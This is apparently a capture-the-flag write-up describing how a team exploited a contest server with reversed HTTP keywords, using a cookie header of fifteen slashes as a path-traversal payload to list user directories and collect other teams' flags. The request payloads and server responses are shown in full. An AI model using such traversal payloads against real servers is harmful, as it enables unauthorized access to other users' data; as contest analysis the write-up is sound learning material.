We noticed that server logs debug info to the stdout.
First idea was path traversal, because server stores files with the names from the requests: path = './' + eikooc + '/' + path
Path traversal in the path didn't work at all, but eikooc
(reversed cookie) was a user directory. So we sent such payload:
TEG / PTTH\1.1
eikooc: ../
And we got log message:
[PID 19] [] TEG SERVER
TEG / PTTH\1.1
eikooc: eikooc: ../
found cookie
[PID 20] [] Fucked up cookie. CLIENT
Ok, we checked condition for this message:
if (some_function(some_ptr) == 15)
{
...
} else {
throw_error("Fucked up cookie.");
}
Hmm, it looks like some_function
is just strlen
and some_ptr
is eikooc
pointer.
And finally we sent such payload (with exactly 15 slashes in the eikooc):
TEG / PTTH\1.1
eikooc: ////////////////////
PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752
<html><head>
<title>Index of data</title>
</head><body>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>
</body></html>
Got it! This request lists all usernames and now we can extract all flags the same way as jury does.
Our FB: FAUST_XOlUOAUHYk6BugAAAABMr89BM6YmLUIM